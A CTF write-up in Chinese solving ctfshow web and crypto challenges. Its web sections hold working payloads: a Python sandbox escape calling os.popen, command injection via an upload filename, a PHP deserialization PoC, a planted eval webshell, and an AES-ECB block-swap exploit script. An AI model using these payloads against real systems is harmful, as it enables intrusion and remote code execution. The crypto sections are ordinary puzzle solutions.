'iroot', 'iroot_rem', 'is_bpsw_prp', 'is_euler_prp', 'is_even', 'is_extra_strong_lucas_prp', 'is_fermat_prp', 'is_fibonacci_prp', 'is_finite', 'is_inf', 'is_infinite', 'is_integer', 'is_lessgreater', 'is_lucas_prp', 'is_nan', 'is_number', 'is_odd', 'is_power', 'is_prime', 'is_regular', 'is_selfridge_prp', 'is_signed', 'is_square', 'is_strong_bpsw_prp', 'is_strong_lucas_prp', 'is_strong_prp', 'is_strong_selfridge_prp', 'is_unordered', 'is_zero', 'isqrt', 'isqrt_rem', 'j0', 'j1', 'jacobi', 'jn', 'kronecker', 'lcm', 'legendre', 'lgamma', 'li2', 'license', 'lngamma', 'local_context', 'log', 'log10', 'log1p', 'log2', 'lucas', 'lucas2', 'lucasu', 'lucasu_mod', 'lucasv', 'lucasv_mod', 'max2', 'maxnum', 'min2', 'minnum', 'modf', 'mp_limbsize', 'mp_version', 'mpc', 'mpc_random', 'mpc_version', 'mpfr', 'mpfr_from_old_binary', 'mpfr_grandom', 'mpfr_random', 'mpfr_version', 'mpq', 'mpq_from_old_binary', 'mpz', 'mpz_from_old_binary', 'mpz_random', 'mpz_rrandomb', 'mpz_urandomb', 'mul', 'mul_2exp', 'nan', 'next_above', 'next_below', 'next_prime', 'next_toward', 'norm', 'num_digits', 'numer', 'pack', 'phase', 'polar', 'popcount', 'powmod', 'proj', 'qdiv', 'radians', 'random_state', 'rec_sqrt', 'rect', 'reldiff', 'remainder', 'remove', 'remquo', 'rint', 'rint_ceil', 'rint_floor', 'rint_round', 'rint_trunc', 'root', 'round2', 'round_away', 'sec', 'sech', 'set_cache', 'set_context', 'set_exp', 'set_sign', 'sign', 'sin', 'sin_cos', 'sinh', 'sinh_cosh', 'sqrt', 'square', 'sub', 't_div', 't_div_2exp', 't_divmod', 't_divmod_2exp', 't_mod', 't_mod_2exp', 'tan', 'tanh', 'to_binary', 'trunc', 'unpack', 'version', 'xbit_mask', 'xmpz', 'y0', 'y1', 'yn', 'zero', 'zeta']
>>>

可以看到能用的太多了,基本上可以构造任意字符了:

import gmpy2
payload="gmpy2.__builtins__['ceil'[1]+'version'[0]+'ai'[0]+'lucasv'[0]]("   
s="__import__('os').popen('id').read()" 
for i in s:
        if i not in "/'(). ":
                temp_index=0
                temp_string='x'*20
                for j in dir(gmpy2):
                        if j.find(i)>=0:
                                if len(j)<len(temp_string):
                                        temp_string=j
                                        temp_index=j.find(i)
                payload+=f'\'{temp_string}\'[{temp_index}]+'
        else:
                payload+=f'\"{i}\"+'    
payload=payload[:-1]+')'  
print(payload)


bit@ubuntu:~$ python3 exp.py 
gmpy2.__builtins__['ceil'[1]+'version'[0]+'ai'[0]+'lucasv'[0]]('c_div'[1]+'c_div'[1]+'ai'[1]+'agm'[2]+'exp'[2]+'cos'[1]+'erf'[1]+'cot'[2]+'c_div'[1]+'c_div'[1]+"("+"'"+'cos'[1]+'cos'[2]+"'"+")"+"."+'exp'[2]+'cos'[1]+'exp'[2]+'erf'[0]+'jn'[1]+"("+"'"+'ai'[1]+'add'[1]+"'"+")"+"."+'erf'[1]+'erf'[0]+'ai'[0]+'add'[1]+"("+")")

image-20221115092713025.png

那就没问题了吧

easyPytHon_P

直接打开容器给出源码:

from flask import request
cmd: str = request.form.get('cmd')
param: str = request.form.get('param')
# ------------------------------------- Don't modify ↑ them ↑! But you can write your code ↓
import subprocess, os
if cmd is not None and param is not None:
    try:
        tVar = subprocess.run([cmd[:3], param, __file__], cwd=os.getcwd(), timeout=5)
        print('Done!')
    except subprocess.TimeoutExpired:
        print('Timeout!')
    except:
        print('Error!')
else:
    print('No Flag!')

关键代码:

subprocess.run([cmd[:3], param, __file__], cwd=os.getcwd(), timeout=5)

其中cmd半可控,param可控 __file__是个固定值。
第一个参数作为命令,后面的都是该命令的参数
比如执行ls /

cmd=ls&param=/

发现可以执行

image-20221115095615970.png

这里传入cmd=cwd 让param后进行命令执行,尝试一下后发现确实可以

image-20221115095128175.png

遍地飘零

源码:

<?php
include "flag.php";
highlight_file(__FILE__);

$zeros="000000000000000000000000000000";

foreach($_GET as $key => $value){
    $$key=$$value;
}

if ($flag=="000000000000000000000000000000"){
    echo "好多零";
}else{
    echo "没有零,仔细看看输入有什么问题吧";
    var_dump($_GET);
}

没有零,仔细看看输入有什么问题吧array(0) { }

很明显的看到最后有一个 var_dump($_GET);
那么简单的一个变量覆盖,让 _GET=flag, 不就会直接打印出flag吗。

茶歇区

image-20221115100708825.png

靠脸吃零食,消耗FP去换分,按这个道理来说,余额是完全不够的,
抓个包看看:

image-20221115101840152.png

php的整形溢出?我分成负数了,没看到有flag
删号重来后,发现之前没flag是里面有哪一个是让我弄反了。

image-20221115102232791.png

小舔田?

源码:

<?php
include "flag.php";
highlight_file(__FILE__);

class Moon{
    public $name="月亮";
    public function __toString(){
        return $this->name;
    }
    
    public function __wakeup(){
        echo "我是".$this->name."快来赏我";
    }
}

class Ion_Fan_Princess{
    public $nickname="牛夫人";

    public function call(){
        global $flag;
        if ($this->nickname=="小甜甜"){
            echo $flag;
        }else{
            echo "以前陪我看月亮的时候,叫人家小甜甜!现在新人胜旧人,叫人家".$this->nickname."。\n";
            echo "你以为我这么辛苦来这里真的是为了这条臭牛吗?是为了你这个没良心的臭猴子啊!\n";
        }
    }
    
    public function __toString(){
        $this->call();
        return "\t\t\t\t\t\t\t\t\t\t----".$this->nickname;
    }
}

if (isset($_GET['code'])){
    unserialize($_GET['code']);

}else{
    $a=new Ion_Fan_Princess();
    echo $a;
}


以前陪我看月亮的时候,叫人家小甜甜!现在新人胜旧人,叫人家牛夫人。 你以为我这么辛苦来这里真的是为了这条臭牛吗?是为了你这个没良心的臭猴子啊! ----牛夫人

简单的反序列化
POP链:Moon::__wakeup()==>Ion_Fan_Princess::__toString()==>Ion_Fan_Princess::call()
poc:

<?php
class Moon{
        public $name;
}
class Ion_Fan_Princess{
        public $nickname;
}

$a=new Moon();
$a->name=new Ion_Fan_Princess();
$a->name->nickname="小甜甜";
echo urlencode(serialize($a));

传入code中即可

LSB探姬

显示源码:
解题工具

显示源码
源代码

</>code
# !/usr/bin/env python
# -*-coding:utf-8 -*-
"""
# File       : app.py
# Time       :2022/10/20 15:16
# Author     :g4_simon
# version    :python 3.9.7
# Description:TSTEG-WEB
# flag is in /app/flag.py
"""
from flask import *
import os
#初始化全局变量
app = Flask(__name__)
@app.route('/', methods=['GET'])
def index():    
    return render_template('upload.html')
@app.route('/upload', methods=['GET', 'POST'])
def upload_file():
    if request.method == 'POST':
        try:
            f = request.files['file']
            f.save('upload/'+f.filename)
            cmd="python3 tsteg.py upload/"+f.filename
            result=os.popen(cmd).read()
            data={"code":0,"cmd":cmd,"result":result,"message":"file uploaded!"}
            return jsonify(data)
        except:
            data={"code":1,"message":"file upload error!"}
            return jsonify(data)
    else:
        return render_template('upload.html')
@app.route('/source', methods=['GET'])
def show_source():
    return render_template('source.html')
if __name__ == '__main__':
    app.run(host='0.0.0.0',port=80,debug=False)

直接进行图片上传他会直接执行 :python3 tsteg.py upload/1.png
抓个包试一下:

image-20221115104458631.png

这里可以用“;”进行命令注入,而且能够执行
那么这样确实是可以直接得到flag

image-20221115104757403.png

Is_Not_Obfuscate

F12看到下面有robots.txt

image-20221115105339330.png

访问得到:

User-agent: *
Allow: /lib.php$
Disallow: /lib.php?flag=0
Disallow: /plugins

再访问url/lib.php?flag=0
回显空白页面,将0改为1
得到:

<?php OOO00OOOO0O000OO0OOOOOOO0OOOO0OOOOOOOO00OOOO0OOOOOOO0O0OOOO00O0OO000OOOO00O0O('index.php');?>
eJwNkze2o0AABA9EAAI0gmADGGEGEE74DI/w3p1+/wX69euqzpVDJ2a/GkWO4z4QQpnTUq9P5fFd3Uu+YvM2ht+ZXSvYiLXq0o8zaUZ/KSKHeeauPge1HS1rQOaCRvmX5oevKRQajpkc1lMgFhD9uJCH4CSDtZnx8zALzJLhLR2K+WAbhIjf62yY9EFNAfOklJvHScguku8Y5yhtuZSeNGY1vr+NHn6Jn3MYCnm/z9GbI9TH0XZfPPoqqZRrKo48Gdz+odPf29M09uAXmYMftuX5lbIg586dsj8IPGvx3sRUZROiNLXSiM4s1dil6jpvB8cst8uk6ftkZcIF9tF4N0l7mIhew6On6LVPiWk7YaFYcBSI+CLjlUx0heeixgqiWcRtNyHMfs64sx7oVEPY4ZVZg/EmgnR+x6othXTZ2ZGQsEYvRa/U1LaK/4D7Op3ZKrKFnzAs01qSCbbf+P097nH5uUElYiGbytryRvxAe4t1V5PA2dkKlweEANhJ+DU5vzz0+doHA+3opUlU80ol9Ghxas7B3bayW892QCULlB3LuNEEaS2mp1LoXm8dTJAZgM3BGfCHNYbkODF0DqNXrFCMswdFjb9cCnMokKdNZnLUubhW0yA4h807ywaHFZvPxCuG05XdxV6nLiZapgdgHjFpXFbnrwz9LIzLCGMw+F7BHMJPheaGD3faUo71nCiV6QWQu0VW/O2DvG+eubaq5t1a5Y3tYJmti6soht26kuF7jUUg+vZz3guJPIhqEvujvCubvp9WFznqRBETu6RM8yssRUdkXOcelo3bvnM3onXcf9+kQvcSUbuwuEnWHYzn16/ewTo+gVIqv0+DNJC0YUGs9kWnS2+1sAvpdp6qe46VGHNv5Ehm8XNg9SPQyrFYwqRuQZZ/r2muD0WE4G5qRRQ8dnmkgxTVF7Zh61/yvmis14AVf3UwjoHywgVs7MNevg/tCL4JwsgHx6FLo0CANOoThXQcpMmu1ZcY+MB7L5c4S+5arvpFKn/GN4KvCEWYZ+r7inzI+ng3O1T0eaaqFmy63HfCz4xYWYn4PFjC7ukhBJfY7E+fPm6bO7/jSe+2SuGuZ5Crxj8yPiLLA1h61snzuxvqfM0ulqNmp/SzwQLyo5N5HVZEVzMdqY7RiEqT6/FOLji7N/7E3c+8ZLOGGQcDJMM5FARuDOfYyh09+M+I1Hdc+bCze4S0TuOa3j7orHPzP/BLQQLKt6c4cLZ42QbgJwmpowDmVjo/R6dyCuJbWwKGS8BVtzxfh2YhYu+r1n7mrY7nPTxszI6w/TWAErJEBVZwXlj33RDqfi+u45uVP292vZOCDP0RHKuVL20QeMwhqsY47fQ7ZuLeKP/9+w8pT7oT

很明显,这是一串加密的东西,再找找,发现有解密的地方:

image-20221115110010590.png

得到源码:

image-20221115111543071.png

大概意思就是假如我们传入output=phpinfo()&action=push,则会生成一个文件,路径为plugins/md5值该md5值是可以本地计算得到了,就是我们代码后面拼接行youyou的md5。
内容是经过encode加密的。
然后如果在传入action=pull&input=刚才生成的文件路径就可以运行刚才的代码了。

?action=push&output=<?php eval($_GET[1]);?>

d6e1f0ec8980b49f6061227495a77a44 为 <?php eval($_GET[1]);?> youyou的md5值; 

?action=pull&input=d6e1f0ec8980b49f6061227495a77a44&1=system("id");

image-20221115112653546.png

龙珠NFT

项目说明:

老板最近天天看web3.0、元宇宙、区块链、NFT什么的,回来跟我说这就是未来,看到别人卖元宇宙地皮,都快开心疯了,让我研发一个区块链龙珠雷达,集齐7颗龙珠就能许愿。
但是我不会啊,随便搞点东西看起来像区块链就完事儿了。
点击开始搜索进行搜寻,每人可以搜10次,用完了就没了。点击获取龙珠可以根据“龙珠地址”获取龙珠。
点击查看库存可以看到现有龙珠库存,凑齐了你就可以许愿了。
交易还没有做,找机会再说吧,反正抽中概率只有0.6%,也没人凑得齐。

登录用户==>开始搜索==>龙珠雷达搜索得到一个地址:
83JkyQe+nHCOaCITdNiRcRxJtB5EdbHumjsRtq3TBjsk2kxJrUkPglUEDkYdDAViZclhAGWhfd6YkmB5lWUqsUWpoo8KyAHYQQcPjvjoNnRnKw5nT6lFtpalKFOoh1Cm/ouYNMqwt2OJjBshY4nJ5SvtcmqZyCjos8Ny7jJbjiA=
提示:点击雷达右侧“开始搜索”可以挖出来一个龙珠地址,将龙珠地址输入下方文本框中,点击“获取”就有可能拿到一颗龙珠。(挖到的概率是万分之六哦~)集齐龙珠就可以拿到flag了。
将地址输入获取地址得到一颗龙珠,后面再重新获取得到的是同样的地址,无法获得龙珠
看来是没那么容易得到,后面还有源码:
源代码:

</>
# !/usr/bin/env python
# -*-coding:utf-8 -*-
"""
# File       : app.py
# Time       :2022/10/20 15:16
# Author     :g4_simon
# version    :python 3.9.7
# Description:DragonBall Radar (BlockChain)
"""
import hashlib
from flask import *
import os
import json
import hashlib
from Crypto.Cipher import AES
import random
import time
import base64
#网上找的AES加密代码,加密我又不懂,加就完事儿了
class AESCipher():
    def __init__(self,key):
        self.key = self.add_16(hashlib.md5(key.encode()).hexdigest()[:16])
        self.model = AES.MODE_ECB
        self.aes = AES.new(self.key,self.model)
    def add_16(self,par):
        if type(par) == str:
            par = par.encode()
        while len(par) % 16 != 0:
            par += b'\x00'
        return par
    def aesencrypt(self,text):
        text = self.add_16(text)
        self.encrypt_text = self.aes.encrypt(text)
        return self.encrypt_text
    def aesdecrypt(self,text):
        self.decrypt_text = self.aes.decrypt(text)
        self.decrypt_text = self.decrypt_text.strip(b"\x00")
        return self.decrypt_text
#初始化全局变量
app = Flask(__name__)
flag=os.getenv('FLAG')
AES_ECB=AESCipher(flag)
app.config['JSON_AS_ASCII'] = False
#懒得弄数据库或者类,直接弄字典就完事儿了
players={}
@app.route('/', methods=['GET'])
def index():
    """
    提供登录功能
    """
@app.route('/radar',methods=['GET','POST'])
def radar():
   """
   提供雷达界面
   """
@app.route('/find_dragonball',methods=['GET','POST'])
def  find_dragonball():
    """
    找龙珠,返回龙珠地址
    """
    xxxxxxxxxxx#无用代码可以忽略
    if search_count==10:#第一次搜寻,给一个一星龙珠
        dragonball="1"
    elif search_count<=0:
        data={"code":1,"msg":"搜寻次数已用完"}
        return jsonify(data)
    else:
        random_num=random.randint(1,1000)
        if random_num<=6:
            dragonball=一个没拿过的球,比如'6'
        else:
            dragonball='0'#0就代表没有发现龙珠
    players[player_id]['search_count']=search_count-1
    data={'player_id':player_id,'dragonball':dragonball,'round_no':str(11-search_count),'time':time.strftime('%Y-%m-%d %H:%M:%S')}
    #json.dumps(data)='{"player_id": "572d4e421e5e6b9bc11d815e8a027112", "dragonball": "1", "round_no": "9", "time":"2022-10-19 15:06:45"}'
    data['address']= base64.b64encode(AES_ECB.aesencrypt(json.dumps(data))).decode()
    return jsonify(data)
@app.route('/get_dragonball',methods=['GET','POST'])
def get_dragonball():
    """
    根据龙珠地址解密后添加到用户信息
    """
    xxxxxxxxx#无用代码可以忽略
    try:
        player_id=request.cookies.get("player_id")
        address=request.args.get('address')
        data=AES_ECB.aesdecrypt(base64.b64decode(address))
        data=json.loads(data.decode())
        if data['dragonball'] !="0":
            players[data['player_id']]['dragonballs'].append(data['dragonball'])
            return jsonify({'get_ball':data['dragonball']})
        else:
            return jsonify({'code':1,'msg':"这个地址没有发现龙珠"})
    except:
        return jsonify({'code':1,'msg':"你干啥???????"})
@app.route('/flag',methods=['GET','POST'])
def get_flag():
    """
    查看龙珠库存
    """
    #如果有7颗龙珠就拿到flag~
@app.route('/source',methods=['GET','POST'])
def get_source():
    """
    查看源代码
    """
if __name__ == '__main__':
    app.run(host='0.0.0.0',port=80,debug=False)

看完源码,直接就 WEB-CRYPTO是吧
简单分析一下,一眼丁真,看到非常贴心的告诉我们哪里是无用的代码

@app.route('/', methods=['GET'])
登录界面,也就是你一开始输入用户名就会将你的用户名进行注册,将其md5作为session存入,

@app.route('/radar',methods=['GET','POST'])
一个雷达界面,让你看起来好看点,实则没啥卵用

@app.route('/find_dragonball',methods=['GET','POST'])
找龙珠,返回龙珠地址,后面已经注释了说是无用代码,也确实,只有第一次获取的时候能获取到一颗龙珠,固定龙珠1,后面会在1-1000的随机数,而当数值在0-6之间,就把dragonball赋值为该数,否则就赋值为0,反正就是明着告诉你你抽不到

@app.route('/get_dragonball',methods=['GET','POST'])
传地址,如果解密后dragonball值不为0,就获得该星龙珠

@app.route('/flag',methods=['GET','POST'])
如果有7颗龙珠就拿到flag~

@app.route('/source',methods=['GET','POST'])
查看源代码

几年前*ctf出过类似的题 也是用aes-ecb加密 然后是交换密文顺序,g4师傅说这个题出的相对来说简单了很多。

根据源码可知,address是用AES的ECB模式加密的,稍微查一下就可以知道,ECB模式一组密文对应一组明文,也就是说,可以通过改变密文的顺序从而改变解密后明文的顺序。

image.png

直接访问/find_dragonba时,已经把密文和明文都给出来了

{"address":"O+xbUjegW0RrLYeEhjOijjb5uhzTYeGTEok0zs2dQS1YvXzyqgAQ3DPCMBaVPO+SZclhAGWhfd6YkmB5lWUqsUWpoo8KyAHYQQcPjvjoNnRnKw5nT6lFtpalKFOoh1CmyxDRKSs+oukVz3qCWhzGVOcFHpJIHHv6BVJziUVffRk=","dragonball":"1","player_id":"aadce520e20c2899f4ced228a79a3083","round_no":"1","time":"2022-11-15 06:11:55"}

观察一下:

image-20221115141849025.png

我们要让dragonball后面的数字是可控的。
exp:

import requests
import json
import base64
import random
url='http://6ddd5dd1-5b72-4b3b-ae60-ac5bfe717098.challenge.ctf.show/'


s=requests.session()
username=str(random.randint(1,100000))
print(username)
r=s.get(url+'?username='+username)
responses=[]

for i in range(10):
        r=s.get(url+'find_dragonball')
        responses.append(json.loads(r.text))

for item in responses:
        data=json.dumps({'player_id':item['player_id'],'dragonball':item['dragonball'],'round_no':item['round_no'],'time':item['time']})
        miwen=base64.b64decode(item['address'])
        round_no=item['round_no']
        if round_no in [str(i) for i in range(1,8)]:
                fake_address=miwen[:64]+miwen[80:]
                fake_address=base64.b64encode(fake_address).decode()
                r=s.get(url+'get_dragonball',params={"address":fake_address})

r=s.get(url+'flag')
print(r.text)

image-20221115142627318.png

CRYPTO

密码签到

密文为: 63746673686f777b77656c636f6d655f325f636169676f755f6375707d
flag格式为 ctfshow{明文}

明显的十六进制(From HEX)
转换一下得到:ctfshow{welcome_2_caigou_cup}

Caesar

密文如下: Zhofrph wr FWIvkrz yhjhwdeoh grj fxs!

flag格式为 ctfshow{明文}

区分大小写,包含空格

凯撒移位3 随便试一下就可了
得到:Welcome to CTFshow vegetable dog cup!

或者枚举一下:

Zhofrph wr FWIvkrz yhjhwdeoh grj fxs!
Ygneqog vq EVHujqy xgigvcdng fqi ewr!
Xfmdpnf up DUGtipx wfhfubcmf eph dvq!
Welcome to CTFshow vegetable dog cup!
Vdkbnld sn BSErgnv udfdszakd cnf bto!
Ucjamkc rm ARDqfmu tcecryzjc bme asn!
Tbizljb ql ZQCpelt sbdbqxyib ald zrm!
Sahykia pk YPBodks racapwxha zkc yql!
Rzgxjhz oj XOAncjr qzbzovwgz yjb xpk!
Qyfwigy ni WNZmbiq pyaynuvfy xia woj!
Pxevhfx mh VMYlahp oxzxmtuex whz vni!
Owdugew lg ULXkzgo nwywlstdw vgy umh!
Nvctfdv kf TKWjyfn mvxvkrscv ufx tlg!
Mubsecu je SJVixem luwujqrbu tew skf!
Ltardbt id RIUhwdl ktvtipqat sdv rje!
Kszqcas hc QHTgvck jsushopzs rcu qid!
Jrypbzr gb PGSfubj irtrgnoyr qbt phc!
Iqxoayq fa OFRetai hqsqfmnxq pas ogb!
Hpwnzxp ez NEQdszh gprpelmwp ozr nfa!
Govmywo dy MDPcryg foqodklvo nyq mez!
Fnulxvn cx LCObqxf enpncjkun mxp ldy!
Emtkwum bw KBNapwe dmombijtm lwo kcx!
Dlsjvtl av JAMzovd clnlahisl kvn jbw!
Ckriusk zu IZLynuc bkmkzghrk jum iav!
Bjqhtrj yt HYKxmtb ajljyfgqj itl hzu!
Aipgsqi xs GXJwlsa zikixefpi hsk gyt!

0x36d


提示: 有没有一种可能,标题就是密码?

0x36d我熟啊不就是36D嘛,见多了
来到颜文字解密,直接输入密码 0x36d不对,换成十进制 316^2+616+13 = 877

image-20221115143720925.png

类型-7

密文如下: 094F5A0F0A0D1805103B0B3D143117183B720438350A45550967674D1E064F2969784440455A460F1A1B

看不出来啥玩意,题目也没啥说明,题目,题目?

image-20221115144318184.png

嗦嘎:

image-20221115144420389.png

g4的密码小课堂

crypto.py:

# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2022-11-11 13:46:24
# @Last Modified by:   h1xa
# @Last Modified time: 2022-11-11 13:46:32
# @email: h1xa@ctfer.com
# @link: https://ctfer.com


# D0_U_kn0w_wh4t_1s_double_p_q?
from Crypto.Util.number import *
import gmpy2
from secret import flag

m = bytes_to_long(flag)
p1 = getPrime(256)
p2 = gmpy2.next_prime(p1)
q1 = getPrime(256)
q2 = gmpy2.next_prime(q1)
n = p1*p2*q1*q2
e = 65537
c = pow(m, e, n)
print(f'n = {n}')
print(f'e = {e}')
print(f'c = {c}')

'''
n = 32481415283829255738340971974996440308678927230347135108620374939715138530763511922162670183907243606574444169915409791604348383760619870966025875897723568019791384873824917630615306169399783499416450554084947937964622799112489092007113967359069561646966430880857626323529067736582503070705981530002918845439
e = 65537
c = 13000287388412632836037240605681731720629565122285665653580432791960428695510699983959843546876647788034949392762752577597448919397451077080119543495058705350347758604475392673242110787093172219487592930482799866421316089027633497253411081184454114601840835490688775466505809830410778091437211186254631834255

'''

对于一个奇合数,n=p*q
可以写成一个平方差:

image-20221115144940133.png

费马质因数分解算法,就是不停地循环尝试,找到两个数:

image.png

找到这两个数之后 a+b和a-b就是p和q了。根据平方差公式,我们知道:

image (1).png

然后我们让a从根号n开始尝试,然后不断+1直到a^2 -n为一个平方数位置。
关键代码:

p1  = getPrime(256)
p2 = gmpy2.next_prime(p1)
q1  = getPrime(256)
q2 = gmpy2.next_prime(q1)

由于p1和p2挨得近,q1和q2挨得近。所以我们知道,下面这两组解离n的中间值(根号n)很近。这并不是真正意义上的中间值,只是说相对于别的解,p1q1和p2q2挨着相对很近。
所以我们使用费马分解,我们就可以在短时间内爆破出这两组非质数的),而且因为我们知道它其实是从‘中间’开始往两边爆破的,一旦我们两组解([p1q1,p2q2],[p1q2,p2q1])都有了,求它们的公因数就能得到p1或q1的值,从而得到所有4个因子的值。

from Crypto.Util.number import *
import gmpy2

n = 32481415283829255738340971974996440308678927230347135108620374939715138530763511922162670183907243606574444169915409791604348383760619870966025875897723568019791384873824917630615306169399783499416450554084947937964622799112489092007113967359069561646966430880857626323529067736582503070705981530002918845439
e = 65537
c = 13000287388412632836037240605681731720629565122285665653580432791960428695510699983959843546876647788034949392762752577597448919397451077080119543495058705350347758604475392673242110787093172219487592930482799866421316089027633497253411081184454114601840835490688775466505809830410778091437211186254631834255

def factor(n):
    pq_list = []
    a = gmpy2.iroot(n, 2)[0]
    while 1:
        B_2 = pow(a, 2) - n
        if gmpy2.is_square(B_2):
            b = gmpy2.iroot(B_2, 2)[0]
            p1q1= a - b
            p2q2 = a + b
            pq_list.append([p1q1, p2q2])
            if len(pq_list) == 2:
                break
        a += 1  
    return pq_list

pq_list = factor(n)

X1, Y1 = pq_list[0]
X2, Y2 = pq_list[1]

p1 = gmpy2.gcd(X1, X2)
q1 = gmpy2.gcd(Y1, Y2)

p2 = X2 // p1
q2 = Y2 // q1

phi = (p1 - 1)*(q1 - 1)*(p2 - 1)*(q2 - 1)
d = gmpy2.invert(e,phi)
m = pow(c,d,n)
flag = long_to_bytes(m)
print(flag)

# ctfshow{you_Know__doub1e_g2_1s_g4_s1m0n}

ACMer也想要玩密码学

题目都这么长:

苏卡和米古丽是一对好♂朋♂友,但是因为宝可梦出题组的任务原因,两人不得不分开,分别前往不同的地方执行任务,远隔千里的他们只能通过网络调情,但是两人都不希望有别人窥探他们的隐私,便找到了探姬,想让她开发一款独立在通信频道外的动态令牌。
有了令牌的存在,他们在公共频道中的消息均用密文收发,g4对米古丽惦记已久,但因为令牌的干扰,无法得知他们的聊天内容,无奈的他骇进了探姬的电脑,但令牌已经交付,程序并没有备份,只找到了下面这份研发文档:
**2022/11/06 02:02**
  由于是通过电磁波无线传输数据,难免会出现一些偏差(比特翻转,即传输的二进制数据中某一位`0`变`1`或`1`变`0`),而为了修正这个偏差,我让令牌的动态码在每次传输数据时都会额外传输一些信息用于标记某一行或某一列`1`的数量为偶数还是奇数,这样就能够判断是否发生错误并进行修正。
设定规则如下:
  假如令牌传输`10111110`这串二进制数据,则将其划分为一个二维矩阵,其中第一行以及每行的第一位不存储实际数据,而是存储标识位。

- 第一行第一位为无效位
- 第一行中(除第一位外)的每一位用于标记当前列(不包括第一行)中`1`的奇偶数
- 从第二行开始的每一行的最高位用于标记当前行(不包括第一位)中`1`的奇偶数

  按照这样的规定,当标识位为`1`时表示该标识对应的行/列上`1`的数量为偶数,否则为奇数。
  按照上述规则,以`1011111000100110110101110111001`为例子,可划分为下面这样的二维矩阵:

```
                 10111110
             1011111000100110110101110111001
-----------------------------------------------------------------------
      | -> | 00100000111011001001010001000110
 10111110 | -> | 11011111000100110110101110111001
                  
```

  为了方便起见,我将要传输的数据量设定为`31bit`的整数倍,并且在发送时就完成数据的二维化,每次发送一个总数,一直到发送EOF终止符,每个令牌组暂时固定为32位。
唔,得益于宝可梦出题组的优秀设备和考虑到两人的位置环境,以及传输环境,我可以保证数据中最多只有一个错误比特,且标识位一定没有发生比特翻转。
不过后面写加密的时候一整串二进制数字好像有点大,求余到依依吧。
虽然只是简单的异或,但拿不到令牌也解不动,就不套什么加密了,直接交付吧嘿嘿嘿。
附,一些实验数据:
Get

```
1546654568
-70259354
-2000941226
-1489037912
1386538991
1594702065
-75294974
-1434138292
337572188
462963458
-1837589791
-1559749412
186694557
746658962
560535175
-2056966048
1095910008
-1583830502
-1631453206
1808401715
939657852
390762637
-13704376
-1390791142
1680636301
-1326154359
-544089785
-1760715624
-1216236641
-1318240568
-1937065123
-1610385537
1952841665
```

Fixed

```
1111011110011111110110101100110
0001000101111000000111101010110
0100111001111110001010110101000
1010010101001001110011111101111
1011111000011010011100011110001
1111011100000110001011100000010
0101010100001001100100101001100
0010100000111101111000101011100
0011011100110000100001100000010
0010010011110001001101011100001
0100011000010000001110011011100
0001011001000001011101110011101
0101100100000010001110010010010
0100001011010010001011010000111
0000101011001010011000001100000
1000001010100100100001001111000
0100001100110001010101000011010
0011110110000011111111111101010
1101011110010100000010100110011
0111000000000100000101001111100
0010111010010101001000010001101
1111111001011101110001101001000
0101101000110100011011000011010
1100100001011000111100110001101
0110000111101000111110110001001
1011111100100011101100101000111
0010111000011011001110010011000
0110111100000011011001110011111
0110001011011010011111011001000
0001100100010101011101101011101
0100000000000110111011101111111
1110100011001011111111111000001
```

Get

```
2096378315
-1019477714
2080289518
-1727136162
1502102710
-1832108076
-555146381
1712506508
-27994096
-1299254794
-1869148956
579468139
1591020671
-365684825
-65376630
1884283465
-915867079
455125684
-250554391
-579567935
-936826919
-1151748324
1420102180
-1189273008
-1604344733
1562642112
918473631
1681318183
250232196
541480022
367645158
119210050
747853341
```

Fixed

```
1000011001111000000000100101110
1111011111111101011001011101110
0011001000011011111111001011110
1011001100010000100010010110110
0010010110011000011111111010100
1011110111010010010001101110011
1100110000100101100011010001100
1111110010101001101100000010000
0110010100011101111000111110110
0010000100101110000110011100100
0100010100010011111101101101011
1011110110101010000110001111111
1101010001101000001011110100111
1111100000110100110111010001010
1110000010011111110001001001001
1001001011010001111101000111001
0011011001000001010101010110100
1110001000100001101011111101001
1011101011101000111111011000001
1001000001010010010011111011001
0111011010110011011011100011100
1010100101001010000101000100100
0111001000111010010001001010000
0100000010111111010010001100011
1011101001001000000011011000000
0110110101111101100101110011111
1100100001101101110000100100111
0001110111010100011110110000100
0100000010001100101010001010110
0010101111010011101000111100110
0000111000110110000000001000010
0101100100100110101011000011101
```

g4想知道聊天内容,他已经编写好了解密脚本,而你需要完成解码脚本,两者结合得到他们聊天的内容。
你得到的传输量如下:

```
1075134823
1301324306
-617273449
-1172376622
1415836736
-295015838
1906939195
1058922943
-1950130772
1087806288
-295089743
-798022633
-600713425
1524733253
205134249
-1918510534
-1745351820
1728344637
1814440199
-698023571
911415104
-606256197
-1954053178
584869358
1471096571
542686205
-1413881575
-50654904
1018161262
-1456425359
-226298669
-970339864
2041042125
```

在公共频道捕获的密文如下:

```
tthgYfobWGhnenk;WaxcZe7:b`x9ldgr
```

g4已经为你准备好了脚本

```python
str = ""

key = []
with open("bitkey.txt") as f:
    for line in f:
        key.append((int(line,2)%11))

for i in range(len(str)):
    print(chr(ord(str[i])^key[i]),end="")
```


//@author :kmar.top
#include <stdio.h>

// 输入数据
int input[1024];
// 每行的标识位
int lineTag[1024];
// 每列的标识位,列标从最低位开始从0增长
int columnTag[31];

/** 计算当前数据的第一行校验码 */
void checkColumn(int size) {
    for (int column = 0; column != 31; ++column) {
        columnTag[column] = 1;
        for (int line = 1; line != size; ++line) {
            columnTag[column] ^= (input[line] >> column) & 1;
        }
    }
}

/** 计算当前数据的第一列校验码 */
void checkLine(int size) {
    for (int line = 1; line != size; ++line) {
        lineTag[line] = 1;
        for (int column = 0; column != 31; ++column) {
            lineTag[line] ^= (input[line] >> column) & 1;
        }
    }
}

/** 纠正 */
void correct(int size) {
    checkColumn(size);
    checkLine(size);
    for (int line = 1; line != size; ++line) {
        // 判断输入数据中的行标识和计算出来的行标识是否一致
        if (((input[line] >> 31) & 1) == lineTag[line]) continue;
        // 不一致说明当前行存在错误,遍历列查找错误位置
        for (int column = 0; column != 31; ++column) {
            // 判断输入数据中的列标识和计算出来的是否一致
            // 如果不一致就表示成功定位到错误信息的位置
            if (columnTag[column] == ((input[0] >> column) & 1)) continue;
            // 反转错误信息所在位的值
            int value = (input[line] >> column) & 1;
            if (value) input[line] &= ~(1 << column);
            else input[line] |= 1 << column;
            return; // 最多只有一个错误,找到后直接退出
        }
    }
}

int main() {
    int size = 0;
    for (int i = 0; ; ++i) {
        if (!~scanf("%d", &input[size])) break;
        ++size;
    }

    correct(size);

    for (int line = 1; line != size; ++line) {
        for (int column = 30; column != -1; --column) {
            printf("%d", (input[line] >> column) & 1);
        }
        printf("\n");
    }
